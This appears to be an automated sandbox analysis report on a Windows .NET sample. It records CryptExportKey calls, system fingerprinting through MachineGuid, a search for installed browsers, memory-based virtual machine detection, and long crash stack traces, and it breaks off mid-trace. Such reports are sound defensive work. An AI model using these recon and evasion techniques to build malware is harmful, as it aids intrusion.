CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00591180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058bbe8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058c4a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058c4a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058c4a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058bc28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058bc28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058bc28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\libegl.dll
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 6, 2021, 6:19 p.m.		1	1	0

One or more processes crashed (16 events)

Time & API	Arguments	Status
__exception__ Sept. 6, 2021, 6:19 p.m.	stacktrace: K32EnumProcessModules+0x18 RegisterApplicationRestart-0x1be kernel32+0x3b37e @ 0x7575b37e 0x664b35 0x664aaa 0x662385 0x661d3b 0x660285 0x9050f97 system+0x1d3f63 @ 0x6df33f63 0xacfc27 0xace30c system+0x19c522 @ 0x6e83c522 system+0x19e920 @ 0x6e83e920 system+0x19e803 @ 0x6e83e803 0xac1509 system+0x1f9799 @ 0x6e899799 system+0x1f92c8 @ 0x6e8992c8 system+0x1eca74 @ 0x6e88ca74 system+0x1ec868 @ 0x6e88c868 system+0x1f82b8 @ 0x6e8982b8 system+0x1ee54d @ 0x6e88e54d system+0x1f70ea @ 0x6e8970ea system+0x1e56c0 @ 0x6e8856c0 system+0x1f8215 @ 0x6e898215 system+0x1f6f75 @ 0x6e896f75 system+0x1ee251 @ 0x6e88e251 system+0x1ee229 @ 0x6e88e229 system+0x1ee170 @ 0x6e88e170 0x52a08e gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755b6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755b6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x773b011a system+0x1ebc85 @ 0x6e88bc85 system+0x1f683b @ 0x6e89683b system+0x1a5e44 @ 0x6e845e44 system+0x1fd8a0 @ 0x6e89d8a0 system+0x1fd792 @ 0x6e89d792 system+0x1a14bd @ 0x6e8414bd 0xac0088 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72752e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72807610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72891dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72891e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72891f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7289416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7376f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 89 04 91 c7 45 fc fe ff ff ff ff 45 10 81 7d 10 exception.symbol: K32EnumProcessModules+0x113 RegisterApplicationRestart-0xc3 kernel32+0x3b479 exception.instruction: mov dword ptr [ecx + edx*4], eax exception.module: KERNEL32.dll exception.exception_code: 0xc0000005 exception.offset: 242809 exception.address: 0x7575b479 registers.esp: 2614632 registers.edi: 1990713288 registers.eax: 16777216 registers.ebp: 2614836 registers.edx: 0 registers.ebx: 0 registers.esi: 1 registers.ecx: 0	1
__exception__ Sept. 6, 2021, 6:19 p.m.	stacktrace: K32EnumProcessModules+0x18 RegisterApplicationRestart-0x1be kernel32+0x3b37e @ 0x7575b37e 0x664b35 0x664aaa 0x662385 0x661d3b 0x660285 0x9050f97 system+0x1d3f63 @ 0x6df33f63 0xacfc27 0xace30c system+0x19c522 @ 0x6e83c522 system+0x19e920 @ 0x6e83e920 system+0x19e803 @ 0x6e83e803 0xac1509 system+0x1f9799 @ 0x6e899799 system+0x1f92c8 @ 0x6e8992c8 system+0x1eca74 @ 0x6e88ca74 system+0x1ec868 @ 0x6e88c868 system+0x1f82b8 @ 0x6e8982b8 system+0x1ee54d @ 0x6e88e54d system+0x1f70ea @ 0x6e8970ea system+0x1e56c0 @ 0x6e8856c0 system+0x1f8215 @ 0x6e898215 system+0x1f6f75 @ 0x6e896f75 system+0x1ee251 @ 0x6e88e251 system+0x1ee229 @ 0x6e88e229 system+0x1ee170 @ 0x6e88e170 0x52a08e gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755b6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755b6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x773b011a system+0x1ebc85 @ 0x6e88bc85 system+0x1f683b @ 0x6e89683b system+0x1a5e44 @ 0x6e845e44 system+0x1fd8a0 @ 0x6e89d8a0 system+0x1fd792 @ 0x6e89d792 system+0x1a14bd @ 0x6e8414bd 0xac0088 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72752e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72807610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72891dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72891e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72891f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7289416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7376f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 89 04 91 c7 45 fc fe ff ff ff ff 45 10 81 7d 10 exception.symbol: K32EnumProcessModules+0x113 RegisterApplicationRestart-0xc3 kernel32+0x3b479 exception.instruction: mov dword ptr [ecx + edx*4], eax exception.module: KERNEL32.dll exception.exception_code: 0xc0000005 exception.offset: 242809 exception.address: 0x7575b479 registers.esp: 2614632 registers.edi: 1990713288 registers.eax: 4194304 registers.ebp: 2614836 registers.edx: 0 registers.ebx: 0 registers.esi: 1 registers.ecx: 0	1
__exception__ Sept. 6, 2021, 6:19 p.m.	stacktrace: K32EnumProcessModules+0x18 RegisterApplicationRestart-0x1be kernel32+0x3b37e @ 0x7575b37e 0x664b35 0x664aaa 0x662385 0x661d3b 0x660285 0x9050f97 system+0x1d3f63 @ 0x6df33f63 0xacfc27 0xace30c system+0x19c522 @ 0x6e83c522 system+0x19e920 @ 0x6e83e920 system+0x19e803 @ 0x6e83e803 0xac1509 system+0x1f9799 @ 0x6e899799 system+0x1f92c8 @ 0x6e8992c8 system+0x1eca74 @ 0x6e88ca74 system+0x1ec868 @ 0x6e88c868 system+0x1f82b8 @ 0x6e8982b8 system+0x1ee54d @ 0x6e88e54d system+0x1f70ea @ 0x6e8970ea system+0x1e56c0 @ 0x6e8856c0 system+0x1f8215 @ 0x6e898215 system+0x1f6f75 @ 0x6e896f75 system+0x1ee251 @ 0x6e88e251 system+0x1ee229 @ 0x6e88e229 system+0x1ee170 @ 0x6e88e170 0x52a08e gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755b6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755b6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x773b011a system+0x1ebc85 @ 0x6e88bc85 system+0x1f683b @ 0x6e89683b system+0x1a5e44 @ 0x6e845e44 system+0x1fd8a0 @ 0x6e89d8a0 system+0x1fd792 @ 0x6e89d792 system+0x1a14bd @ 0x6e8414bd 0xac0088 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72752e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72807610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72891dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72891e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72891f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7289416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7376f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 89 04 91 c7 45 fc fe ff ff ff ff 45 10 81 7d 10 exception.symbol: K32EnumProcessModules+0x113 RegisterApplicationRestart-0xc3 kernel32+0x3b479 exception.instruction: mov dword ptr [ecx + edx*4], eax exception.module: KERNEL32.dll exception.exception_code: 0xc0000005 exception.offset: 242809 exception.address: 0x7575b479 registers.esp: 2614632 registers.edi: 1990713288 registers.eax: 14090240 registers.ebp: 2614836 registers.edx: 0 registers.ebx: 0 registers.esi: 1 registers.ecx: 0	1
__exception__ Sept. 6, 2021, 6:19 p.m.	stacktrace: K32EnumProcessModules+0x18 RegisterApplicationRestart-0x1be kernel32+0x3b37e @ 0x7575b37e 0x664b35 0x664aaa 0x662385 0x661d3b 0x660285 0x9050f97 system+0x1d3f63 @ 0x6df33f63 0xacfc27 0xace30c system+0x19c522 @ 0x6e83c522 system+0x19e920 @ 0x6e83e920 system+0x19e803 @ 0x6e83e803 0xac1509 system+0x1f9799 @ 0x6e899799 system+0x1f92c8 @ 0x6e8992c8 system+0x1eca74 @ 0x6e88ca74 system+0x1ec868 @ 0x6e88c868 system+0x1f82b8 @ 0x6e8982b8 system+0x1ee54d @ 0x6e88e54d system+0x1f70ea @ 0x6e8970ea system+0x1e56c0 @ 0x6e8856c0 system+0x1f8215 @ 0x6e898215 system+0x1f6f75 @ 0x6e896f75 system+0x1ee251 @ 0x6e88e251 system+0x1ee229 @ 0x6e88e229 system+0x1ee170 @ 0x6e88e170 0x52a08e gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755b6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755b6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x773b011a system+0x1ebc85 @ 0x6e88bc85 system+0x1f683b @ 0x6e89683b system+0x1a5e44 @ 0x6e845e44 system+0x1fd8a0 @ 0x6e89d8a0 system+0x1fd792 @ 0x6e89d792 system+0x1a14bd @ 0x6e8414bd 0xac0088 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72752e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72807610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72891dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72891e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72891f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7289416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7376f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 89 04 91 c7 45 fc fe ff ff ff ff 45 10 81 7d 10 exception.symbol: K32EnumProcessModules+0x113 RegisterApplicationRestart-0xc3 kernel32+0x3b479 exception.instruction: mov dword ptr [ecx + edx*4], eax exception.module: KERNEL32.dll exception.exception_code: 0xc0000005 exception.offset: 242809 exception.address: 0x7575b479 registers.esp: 2614632 registers.edi: 1990713288 registers.eax: 11010048 registers.ebp: 2614836 registers.edx: 0 registers.ebx: 0 registers.esi: 1 registers.ecx: 0	1
__exception__ Sept. 6, 2021, 6:20 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x70711194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x705e2ba1 mscorlib+0x2f0dd9 @ 0x6f890dd9 mscorlib+0x2ebefa @ 0x6f88befa mscorlib+0x2ebe3d @ 0x6f88be3d mscorlib+0x2c9783 @ 0x6f869783 mscorlib+0xa92583 @ 0x70032583 0x711a73 mscorlib+0x2d5861 @ 0x6f875861 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70562652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7057264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70572e95 DllGetClassObjectInternal+0x357ee CorDllMainForThunk-0x56d0d clr+0xfa867 @ 0x7065a867 DllGetClassObjectInternal+0x358c6 CorDllMainForThunk-0x56c35 clr+0xfa93f @ 0x7065a93f PreBindAssemblyEx+0x107ff StrongNameSignatureVerification-0x174c clr+0x18836a @ 0x706e836a PreBindAssemblyEx+0x108ef StrongNameSignatureVerification-0x165c clr+0x18845a @ 0x706e845a CreateAssemblyNameObject+0x28676 GetMetaDataInternalInterface-0xfdf9 clr+0x55b0f @ 0x705b5b0f GetPrivateContextsPerfCounters+0x13ac DllGetActivationFactoryImpl-0x134b9 clr+0x8932e @ 0x705e932e mscorlib+0x2d5eb7 @ 0x6f875eb7 mscorlib+0x2d5c33 @ 0x6f875c33 mscorlib+0x2d7894 @ 0x6f877894 mscorlib+0x2d74ff @ 0x6f8774ff mscorlib+0x2d71c3 @ 0x6f8771c3 mscorlib+0x2d48ea @ 0x6f8748ea mscorlib+0x36990b @ 0x6f90990b 0x71f069 0x71ee0b 0x71ee4c 0x71ee0b 0x71eab9 0x71e08b system+0x19c522 @ 0x6da8c522 system+0x19e920 @ 0x6da8e920 system+0x19e803 @ 0x6da8e803 0x71175e system+0x1f9799 @ 0x6dae9799 system+0x1f92c8 @ 0x6dae92c8 system+0x1eca74 @ 0x6dadca74 system+0x1ec868 @ 0x6dadc868 system+0x1f82b8 @ 0x6dae82b8 system+0x1ee54d @ 0x6dade54d system+0x1f70ea @ 0x6dae70ea system+0x1e56c0 @ 0x6dad56c0 system+0x1f8215 @ 0x6dae8215 system+0x1f6f75 @ 0x6dae6f75 system+0x1ee251 @ 0x6dade251 system+0x1ee229 @ 0x6dade229 system+0x1ee170 @ 0x6dade170 0x57a08e gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755b6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755b6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x773b011a system+0x1ebc85 @ 0x6dadbc85 system+0x1f683b @ 0x6dae683b system+0x1a5e44 @ 0x6da95e44 system+0x1fd8a0 @ 0x6daed8a0 system+0x1fd792 @ 0x6daed792 system+0x1a14bd @ 0x6da914bd 0x71116a DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70562652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7057264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70572e95 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 3722488 registers.edi: 0 registers.eax: 3722488 registers.ebp: 3722568 registers.edx: 0 registers.ebx: 4366184 registers.esi: 4020592 registers.ecx: 48329910	1
__exception__ Sept. 6, 2021, 6:20 p.m.	stacktrace: K32EnumProcessModules+0x18 RegisterApplicationRestart-0x1be kernel32+0x3b37e @ 0x7575b37e 0x6ed5dfd 0x6ed5d72 0x6ed35c1 0x6ed2edb 0x6ed13ac 0x21a0f97 system+0x1d3f63 @ 0x6d413f63 0x71eccc 0x71e08b system+0x19c522 @ 0x6da8c522 system+0x19e920 @ 0x6da8e920 system+0x19e803 @ 0x6da8e803 0x71175e system+0x1f9799 @ 0x6dae9799 system+0x1f92c8 @ 0x6dae92c8 system+0x1eca74 @ 0x6dadca74 system+0x1ec868 @ 0x6dadc868 system+0x1f82b8 @ 0x6dae82b8 system+0x1ee54d @ 0x6dade54d system+0x1f70ea @ 0x6dae70ea system+0x1e56c0 @ 0x6dad56c0 system+0x1f8215 @ 0x6dae8215 system+0x1f6f75 @ 0x6dae6f75 system+0x1ee251 @ 0x6dade251 system+0x1ee229 @ 0x6dade229 system+0x1ee170 @ 0x6dade170 0x57a08e gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755b6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755b6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x773b011a system+0x1ebc85 @ 0x6dadbc85 system+0x1f683b @ 0x6dae683b system+0x1a5e44 @ 0x6da95e44 system+0x1fd8a0 @ 0x6daed8a0 system+0x1fd792 @ 0x6daed792 system+0x1a14bd @ 0x6da914bd 0x71116a DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70562652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7057264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70572e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x706274ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70627610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x706b1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x706b1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x706b1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x706b416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d6f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b17f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b14de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 89 04 91 c7 45 fc fe ff ff ff ff 45 10 81 7d 10 exception.symbol: K32EnumProcessModules+0x113 RegisterApplicationRestart-0xc3 kernel32+0x3b479 exception.instruction: mov dword ptr [ecx + edx*4], eax exception.module: KERNEL32.dll exception.exception_code: 0xc0000005 exception.offset: 242809 exception.address: 0x7575b479 registers.esp: 3728960 registers.edi: 1990713288 registers.eax: 16777216 registers.ebp: 3729164 registers.edx: 0 registers.ebx: 0 registers.esi: 1 registers.ecx: 0	1
__exception__ Sept. 6, 2021, 6:20 p.m.	stacktrace: K32EnumProcessModules+0x18 RegisterApplicationRestart-0x1be kernel32+0x3b37e @ 0x7575b37e 0x6ed5dfd 0x6ed5d72 0x6ed35c1 0x6ed2edb 0x6ed13ac 0x21a0f97 system+0x1d3f63 @ 0x6d413f63 0x71eccc 0x71e08b system+0x19c522 @ 0x6da8c522 system+0x19e920 @ 0x6da8e920 system+0x19e803 @ 0x6da8e803 0x71175e system+0x1f9799 @ 0x6dae9799 system+0x1f92c8 @ 0x6dae92c8 system+0x1eca74 @ 0x6dadca74 system+0x1ec868 @ 0x6dadc868 system+0x1f82b8 @ 0x6dae82b8 system+0x1ee54d @ 0x6dade54d system+0x1f70ea @ 0x6dae70ea system+0x1e56c0 @ 0x6dad56c0 system+0x1f8215 @ 0x6dae8215 system+0x1f6f75 @ 0x6dae6f75 system+0x1ee251 @ 0x6dade251 system+0x1ee229 @ 0x6dade229 system+0x1ee170 @ 0x6dade170 0x57a08e gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755b6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755b6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x773b011a system+0x1ebc85 @ 0x6dadbc85 system+0x1f683b @ 0x6dae683b system+0x1a5e44 @ 0x6da95e44 system+0x1fd8a0 @ 0x6daed8a0 system+0x1fd792 @ 0x6daed792 system+0x1a14bd @ 0x6da914bd 0x71116a DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70562652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7057264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70572e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x706274ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70627610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x706b1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x706b1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x706b1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x706b416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d6f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b17f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b14de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 89 04 91 c7 45 fc fe ff ff ff ff 45 10 81 7d 10 exception.symbol: K32EnumProcessModules+0x113 RegisterApplicationRestart-0xc3 kernel32+0x3b479 exception.instruction: mov dword ptr [ecx + edx*4], eax exception.module: KERNEL32.dll exception.exception_code: 0xc0000005 exception.offset: 242809 exception.address: 0x7575b479 registers.esp: 3728960 registers.edi: 1990713288 registers.eax: 4194304 registers.ebp: 3729164 registers.edx: 0 registers.ebx: 0 registers.esi: 1 registers.ecx: 0	1
__exception__ Sept. 6, 2021, 6:20 p.m.	stacktrace: K32EnumProcessModules+0x18 RegisterApplicationRestart-0x1be kernel32+0x3b37e @ 0x7575b37e 0x6ed5dfd 0x6ed5d72 0x6ed35c1 0x6ed2edb 0x6ed13ac 0x21a0f97 system+0x1d3f63 @ 0x6d413f63 0x71eccc 0x71e08b system+0x19c522 @ 0x6da8c522 system+0x19e920 @ 0x6da8e920 system+0x19e803 @ 0x6da8e803 0x71175e system+0x1f9799 @ 0x6dae9799 system+0x1f92c8 @ 0x6dae92c8 system+0x1eca74 @ 0x6dadca74 system+0x1ec868 @ 0x6dadc868 system+0x1f82b8 @ 0x6dae82b8 system+0x1ee54d @ 0x6dade54d system+0x1f70ea @ 0x6dae70ea system+0x1e56c0 @ 0x6dad56c0 system+0x1f8215 @ 0x6dae8215 system+0x1f6f75 @ 0x6dae6f75 system+0x1ee251 @ 0x6dade251 system+0x1ee229 @ 0x6dade229 system+0x1ee170 @ 0x6dade170 0x57a08e gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755b6de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755b6e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 